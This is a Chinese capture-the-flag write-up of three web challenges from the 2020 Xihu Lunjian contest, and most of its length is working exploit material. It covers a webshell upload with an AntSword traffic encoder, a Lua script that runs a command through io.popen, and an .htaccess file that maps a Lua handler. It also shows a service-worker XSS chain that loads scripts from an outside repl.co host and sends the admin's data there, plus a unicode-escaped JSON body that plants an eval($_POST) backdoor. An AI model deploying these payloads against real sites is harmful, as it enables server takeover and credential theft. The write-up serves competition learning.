2020西湖论剑部分web_wp

前言

国庆末尾,打一波西湖论剑,质量挺高,wp记录一下

WEB

NewUpload

换行+一个图片文件头就可以shell,至于怎么蚁剑怎么连上去,自己随便写一个编码器(如下),然后流量倒到burp,全局修改一下ua

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
/**
* php::base64编码器
* Create at: 2020/10/08 11:54:20
*/

'use strict';

/*
* @param {String} pwd 连接密码
* @param {Array} data 编码器处理前的 payload 数组
* @return {Array} data 编码器处理后的 payload 数组
*/
module.exports = (pwd, data, ext={}) => {
// ########## 请在下方编写你自己的代码 ###################
// 以下代码为 PHP Base64 样例

// 生成一个随机变量名
let randomID = `_0x${Math.random().toString(16).substr(2)}`;
// 原有的 payload 在 data['_']中
// 取出来之后,转为 base64 编码并放入 randomID key 下
data[randomID] = Buffer.from(data['_']).toString('base64');

// shell 在接收到 payload 后,先处理 pwd 参数下的内容,
data[pwd] = data[randomID];

// ########## 请在上方编写你自己的代码 ###################

// 删除 _ 原有的payload
delete data['_'];
// 返回编码器处理后的 payload 数组
return data;
}

但是shell了之后不能执行命令,有宝塔,最后绕过如下,先上传.htaccess

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST /sandbox/srjn384hn4huu9t547u02efk5p/index.php HTTP/1.1
Host: upload.3b97fe.challenge.gcsis.cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------25722740783009030771590356967
Content-Length: 244
Origin: http://upload.3b97fe.challenge.gcsis.cn
Connection: close
Referer: http://upload.3b97fe.challenge.gcsis.cn/sandbox/srjn384hn4huu9t547u02efk5p/
Cookie: PHPSESSID=srjn384hn4huu9t547u02efk5p
Upgrade-Insecure-Requests: 1

-----------------------------25722740783009030771590356967
Content-Disposition: form-data; name="file"; filename=".htaccess"
Content-Type: image/png

AddHandler lua-script .lua
-----------------------------25722740783009030771590356967--

最后上传一个这个

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
require "string"

--[[
This is the default method name for Lua handlers, see the optional
function-name in the LuaMapHandler directive to choose a different
entry point.
--]]
function handle(r)
r.content_type = "text/plain"
r:puts("Hello Lua World!\n")
local t = io.popen('/readflag')
local a = t:read("*all")
r:puts(a)
if r.method == 'GET' then
for k, v in pairs( r:parseargs() ) do
r:puts( string.format("%s: %s\n", k, v) )
end
else
r:puts("Unsupported HTTP method " .. r.method)
end
end

记录一下准备上车的脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<?php
function get_allfiles($path,&$files) {
if(is_dir($path)){
$dp = dir($path);
while ($file = $dp ->read()){
if($file !="." && $file !=".."){
get_allfiles($path."/".$file, $files);
}
}
$dp ->close();
}
if(is_file($path)){
$files[] = $path;
}
}

function get_filenamesbydir($dir){
$files = array();
get_allfiles($dir,$files);
return $files;
}

$filenames = get_filenamesbydir("/var/wwwroot/10.x.x.x/sandbox/");
foreach ($filenames as $value) {
$a = file_get_contents($value);
if("flag{" in $a){
echo $a."<br />";
echo $value;
}
}

HardXSS

这题有点东西,首先是发现https://auth.xss.eec5b2.challenge.gcsis.cn/api/loginStatus?callback=alert(1);//处有一个jsonp,然后再xss.xss.eec5b2.challenge.gcsis.cn/loging处有一个xss

参考文章:https://lightless.me/archives/XSS-With-Service-Worker.html

完美符合我们这道题的条件

攻击过程,在https网站放如下两个js,这里推荐https://repl.it/,白嫖

1
2
3
4
5
6
7
8
9
10
# 1.js
document.domain = "xss.eec5b2.challenge.gcsis.cn";
var iff = document.createElement('iframe');
iff.src = 'https://auth.xss.eec5b2.challenge.gcsis.cn/';
iff.addEventListener("load", function(){ iffLoadover(); });
document.body.appendChild(iff);
exp = `navigator.serviceWorker.register("/api/loginStatus?callback=importScripts('//aa.hongjunxie.repl.co/2.js')//")`;
function iffLoadover(){
iff.contentWindow.eval(exp);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
# 2.js
self.addEventListener('install', function(event) {
console.log('install ok!');
});

this.addEventListener('fetch', function (event) {
var url = event.request.clone();
console.log('url: ', url);
var body = "<script>location='https://aa.hongjunxie.repl.co/'+location.search;</script>";
var init = {headers: {"Content-Type": "text/html"}};
var res = new Response(body, init);
event.respondWith(res.clone());
});

提交https://xss.xss.eec5b2.challenge.gcsis.cn/login?callback=jsonp(%22//aa.hongjunxie.repl.co/1.js%22);// 给admin即可,收到admin的密码,最后登陆拿到flag

EasyJson

通过unciode绕过写入htaccess的自包含木马php_value auto_prepend_fi\le .htaccess#<?php eval($_POST[1])?># \ 然后注释下一行,然后getshell,readflag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /?action=write&filename=.htaccess&source=123 HTTP/1.1
Host: easyjson.c4b1d2.challenge.gcsis.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie:
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 475


{"\u0063\u006f\u006e\u0074\u0065\u006e\u0074":"\u0070\u0068\u0070\u005f\u0076\u0061\u006c\u0075\u0065\u0020\u0061\u0075\u0074\u006f\u005f\u0070\u0072\u0065\u0070\u0065\u006e\u0064\u005f\u0066\u0069\u005c\u000d\u000a\u006c\u0065\u0020\u002e\u0068\u0074\u0061\u0063\u0063\u0065\u0073\u0073\u000d\u000a\u0023\u003c\u003f\u0070\u0068\u0070\u0020\u0065\u0076\u0061\u006c\u0028\u0024\u005f\u0050\u004f\u0053\u0054\u005b\u0031\u005d\u0029\u003f\u003e\u000d\u000a\u0023\u0020\u005c"}

End

决赛轻点虐,师傅们杭州见